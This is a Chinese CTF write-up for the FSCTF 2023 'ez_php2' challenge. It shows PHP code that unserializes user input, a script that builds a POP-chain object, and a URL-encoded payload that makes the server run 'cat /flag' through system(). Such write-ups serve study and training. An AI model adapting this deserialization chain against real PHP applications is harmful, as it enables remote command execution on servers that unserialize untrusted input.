[FSCTF 2023]ez_php2 WP

F1ng

已于 2023-12-17 22:52:34 修改

阅读量238

点赞数 1

文章标签： php

于 2023-12-17 22:50:09 首次发布

本文链接：https://blog.csdn.net/SmillPig/article/details/135052080

版权

进入首页代码如下：

<?php
highlight_file(__file__);
Class Rd{
    public $ending;
    public $cl;

    public $poc;
    public function __destruct()
    {
        echo "All matters have concluded";
        die($this->ending);
    }
    public function __call($name, $arg)
    {
        foreach ($arg as $key =>$value)
        {

            if($arg[0]['POC']=="1111")
            {
                echo "1";
                $this->cl->var1 = "system";
            }
        }
    }
}


class Poc{
    public $payload;

    public $fun;

    public function __set($name, $value)
    {
        $this->payload = $name;
        $this->fun = $value;
    }

    function getflag($paylaod)
    {
        echo "Have you genuinely accomplished what you set out to do?";
        file_get_contents($paylaod);
    }
}

class Er{
    public $symbol;
    public $Flag;

    public function __construct()
    {
        $this->symbol = True;
    }

    public function __set($name, $value)
    {
        $value($this->Flag);
    }


}

class Ha{
    public $start;
    public $start1;
    public $start2;
    public function __construct()
    {
        echo $this->start1."__construct"."</br>";
    }

    public function __destruct()
    {
        if($this->start2==="11111") {
            $this->start1->Love($this->start);
            echo "You are Good!";
        }
    }
}


if(isset($_GET['Ha_rde_r']))
{
    unserialize($_GET['Ha_rde_r']);
} else{
    die("You are Silly goose!");
}
?>

通过审计代码，大概构造出pop链如下:

Ha __destr-> Rd __call -> Er __set

构造字符串：

<?php
Class Rd{
    public $ending;
    public $cl;

    public $poc;

}


class Er{
    public $symbol;
    public $Flag;

}

class Ha{
    public $start;
    public $start1;
    public $start2 = "11111";
}

$Ha_start_dic =  array(
    "POC" => "1111"
);
$Ha_start = array($Ha_start_dic);


$Ha_start1 = new Rd();

$Ha_start1_cl = new Er();
$Ha_start1_cl->Flag = "cat /flag";

$ha = new Ha();
$ha->start = $Ha_start_dic;
$ha->start1 = $Ha_start1;
$Ha_start1->cl = $Ha_start1_cl;
echo urlencode(serialize($ha));

?>

传参请求，拿到flag。

?Ha_rde_r=O%3A2%3A%22Ha%22%3A3%3A%7Bs%3A5%3A%22start%22%3Ba%3A1%3A%7Bs%3A3%3A%22POC%22%3Bs%3A4%3A%221111%22%3B%7Ds%3A6%3A%22start1%22%3BO%3A2%3A%22Rd%22%3A3%3A%7Bs%3A6%3A%22ending%22%3BN%3Bs%3A2%3A%22cl%22%3BO%3A2%3A%22Er%22%3A2%3A%7Bs%3A6%3A%22symbol%22%3BN%3Bs%3A4%3A%22Flag%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7Ds%3A3%3A%22poc%22%3BN%3B%7Ds%3A6%3A%22start2%22%3Bs%3A5%3A%2211111%22%3B%7D